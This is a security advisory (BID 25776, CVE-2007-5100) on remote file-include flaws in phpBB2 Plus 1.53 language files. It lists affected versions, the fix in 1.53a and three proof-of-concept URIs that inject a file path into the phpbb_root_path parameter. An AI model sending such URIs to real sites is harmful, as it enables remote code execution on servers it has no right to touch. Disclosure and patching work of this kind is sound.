PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities
BID:25776
Info
PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 25776 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5100 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 24 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | The vendor disclosed these issues. |
| Vulnerable: |
phpBB2 phpBB2 Plus 1.53 |
| Not Vulnerable: |
phpBB2 phpBB2 Plus 1.53a |
Discussion
PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities
phpBB2 Plus is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions prior to phpBB2 Plus 1.53a are affected.
phpBB2 Plus is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions prior to phpBB2 Plus 1.53a are affected.
Exploit / POC
PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/language/lang_german/lang_admin_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_main_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_admin_album.php?phpbb_root_path=[RFI]?a=
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/language/lang_german/lang_admin_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_main_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_admin_album.php?phpbb_root_path=[RFI]?a=
Solution / Fix
PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities
Solution:
The vendor released phpBB2 Plus 1.53a to address these issues. Please see the references for more information.
phpBB2 phpBB2 Plus 1.53
Solution:
The vendor released phpBB2 Plus 1.53a to address these issues. Please see the references for more information.
phpBB2 phpBB2 Plus 1.53
-
phpBB2 phpbb2_plus_1.53a.zip
http://www.phpbb2.de/dload.php?action=download&file_id=828
References
PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- phpBB2 Plus 1.53a Language File Vulnerable (phpBB2)
- phpBB2 Plus Homepage (phpBB2)